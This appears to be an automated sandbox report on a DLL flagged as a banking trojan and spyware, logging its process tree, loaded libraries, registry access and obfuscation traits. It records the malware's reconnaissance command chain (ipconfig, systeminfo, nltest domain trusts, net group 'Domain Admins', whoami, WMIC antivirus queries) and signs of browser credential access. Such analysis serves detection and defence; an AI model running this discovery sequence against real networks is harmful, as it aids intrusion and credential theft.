Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8CFE038 appears 69 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E477D54 appears 31 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E45E160 appears 147 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E45D5A8 appears 35 times
Source: C:\Windows\explorer.exe	Code function: String function: 0E45D6E8 appears 52 times

Sample file is different than original file name gathered from version info

Source: wait.dll.dll

Binary or memory string: OriginalFilenamenvsvc32.exez- vs wait.dll.dll

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winDLL@70/7@7/4

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D7CB80 LoadLibraryW,GetLastError,swprintf,FormatMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

3_2_00007FF8A8D7CB80

Source: C:\Windows\System32\rundll32.exe

Code function: 3_3_00007DF4A9FC0000 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,

3_3_00007DF4A9FC0000

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D2C180 CoCreateInstance,StringFromGUID2,RegQueryInfoKeyW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegCloseKey,

3_2_00007FF8A8D2C180

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CFEA34 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

3_2_00007FF8A8CFEA34

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stkm[1].bin

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Iyufla1.tmp

Jump to behavior

Source: wait.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump

Source: Iyufla1.tmp.8.dr, Alakow3.tmp.8.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: wait.dll.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: wait.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: wait.dll.dll

Static file information: File size 2151936 > 1048576

Source: wait.dll.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12fe00

Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wait.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: wait.dll.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF

Source: wait.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wait.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

8_2_0E4589E4

PE file contains an invalid checksum

Source: wait.dll.dll

Static PE information: real checksum: 0x1d7e57 should be: 0x216e55

PE file contains sections with non-standard names

Source: wait.dll.dll

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CEAFDF0105 push ecx; retf	3_3_000001CEAFDF010E
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_0000027619780105 push ecx; retf	4_3_000002761978010E
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000002339FC40105 push ecx; retf	6_3_000002339FC4010E

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
